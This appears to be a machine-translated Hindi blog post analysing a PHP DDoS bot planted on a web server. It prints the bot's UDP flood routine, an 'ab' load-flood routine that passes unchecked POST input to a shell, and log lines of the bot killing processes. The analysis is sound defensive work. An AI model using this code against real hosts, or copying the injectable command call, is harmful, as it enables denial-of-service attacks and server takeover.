PHP DDOS bot सर्वर के आसपास चलता है

आज, लगभग दो बजे, जब मैं बिस्तर पर जाना चाहता था, मेरे एक दोस्त ने मुझे स्काइप पर लिखा। पिछले साल, मैंने उन्हें अपने कई सर्वरों को संचालित करने में मदद की। इतनी देर से, उन्होंने लिखा कि उनके सर्वर में से एक का नेटवर्क इंटरफ़ेस पूरी तरह से भरा हुआ है, जिसे mrtg समय-सारणी को देखते हुए। मैंने देखा, वास्तव में, मैं ssh तक भी नहीं पहुंच सका, सर्वर को रिबूट किया गया और स्थिति का विश्लेषण शुरू हुआ ...

स्थिति विश्लेषण

सर्वर को रिबूट करने के बाद, कुछ समय बाद, यातायात फिर से दिखाई दिया। मैंने iptraf लॉन्च किया, इसने एक IP पते पर UDP पैकेटों की एक बड़ी संख्या को दिखाया - " 171.161.224.16 ", जब मैंने इसे dns5.bankofamerica.com में प्रस्तुत किया : सब कुछ जगह में गिर गया, जाहिर है कि सर्वर से एक dDoS है।

IPtables में प्रतिबंधित IP। मैंने शीर्ष पर देखा, httpd प्रक्रियाओं में से एक ने 100% सीपीयू खाया, उस पर स्ट्रेस सेट किया, मैंने उसी परिचित पते को देखा। चूंकि सर्वर पर कोई access_logs नहीं हैं, और error_logs खाली थे, मैंने सुंदर php मॉड्यूल baxtep ( हब पर लेख ) के लॉग की ओर रुख किया, जो php दुभाषिया के माध्यम से किसी भी कमांड को निष्पादित करने के सभी प्रयासों को लॉग करने के लिए लिखता है। मैंने एक RPM किया है और इसे हमेशा वार्ड सर्वरों में रखा है, केवल मामले में। नग्न आंखों के साथ, मैंने वांछित स्क्रिप्ट का नाम निर्धारित किया:

2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php

फ़ाइल कोड संदर्भ द्वारा उपलब्ध है, मैंने इसे google में फाइल से इसकी oknoproblembro लाइन द्वारा पाया, Google का केवल एक परिणाम है, हौसले से मैंने सोचा और हब पर इसके बारे में लिखने का फैसला किया।

कोड विश्लेषण

फ़ाइल का आकार केवल 3kb है, कोड जटिल नहीं है। बॉट की मुख्य विशेषताएं:

• सर्वर पर फ़ाइलें अपलोड करें
• बड़ी संख्या में यूडीपी पैकेट के साथ DDoS
• ab उपयोगिता के माध्यम से ddos

मैं अधिक विस्तार से dDoS पर ध्यान केन्द्रित करूंगा।

  case "ust": $page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page."\n"; $socket = stream_socket_client("udp://$ip:$port"); if ($socket) { stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out); } fclose($socket); break; 

स्क्रिप्ट पैरामीटर के माध्यम से लक्षित किए जा रहे लक्ष्य का पता प्राप्त करता है, यूडीपी सॉकेट खोलता है और, जबकि सॉकेट मौजूद है, 11 वें पोर्ट के लिए अनुरोध भेजता है। इसके अलावा, यह दिलचस्प है कि डेटा में यह अपना स्वयं का पता देता है।

 function curPageURL(){ $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") { $pageURL .= "s"; } $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL; } 

सवाल "क्यों?" मेरे सिर को 12 घंटे तक नहीं छोड़ा है।

एब उपयोगिता के माध्यम से दूसरा हमला तरीका है:

  case "ab": $url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n']; cmdexec("ab -c $c -n $n $url"); break; 

इसके अलावा, आने वाले मापदंडों की कोई जांच नहीं है और आप सर्वर पर मनमाना कमांड निष्पादित कर सकते हैं।

इससे पहले, मैं व्यक्तिगत रूप से php पर एक यूडीपी ddos ​​के पार नहीं आया था, उन्होंने हमें इस से नहीं भरा, यह गूगल - जाहिर है कि लोग लंबे समय से विभिन्न सॉस के साथ अभ्यास कर रहे हैं।

निष्कर्ष

• जैसा कि अभ्यास से पता चला है, इस तरह की स्क्रिप्ट आसानी से पूरे उपलब्ध चैनल को रोकती है।
• स्थिति एक वास्तविकता बन गई, क्योंकि UDP सर्वर पर पैरानॉयडली फ़िल्टर नहीं किया गया था।
• किसी ने BOA डालने का फैसला किया :)